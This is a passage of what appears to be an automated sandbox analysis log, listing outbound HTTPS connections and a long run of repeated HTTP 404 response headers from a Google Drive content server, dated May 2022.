Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:15 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4bAlBbOaiT_hTXvvmYwNRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:15 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vpJfeg6kjn4Ijj-MdmjgMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:17 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9ATWUqWplyjaZX-8YRpg4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:17 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8wRx_faYmVTA8D5WLtXo5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9R5mwl4rYkZg3c-4B7qtMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4qLAeArRAnTGw8wdmFdaFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nK_zVm8RpduIrJRUkFtKrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SCJceu0jJ5LJ5g8si9tx1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-sCDEfOABCSvIz84aGtWdbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-oje0L9RWaQhTRD4wFQsMjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-7x-dDGPCK1jzWlmJAVXdXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-owSLexwcwI23LgFNuhQtcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-wx2waV2Lj-f-ALhfHunfqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tyf8AIDhJKLFOFMri0-Uwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HRWE88d19AAGun80LpdvkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Mcne5Xx0myz3cvt4Cyy1nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-t-xEVNIuAmkzXMY8aP5EfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-Zrg8_pabdy69ezfd0byLvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-RVtF3aLbLRDvajVCurLGVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, 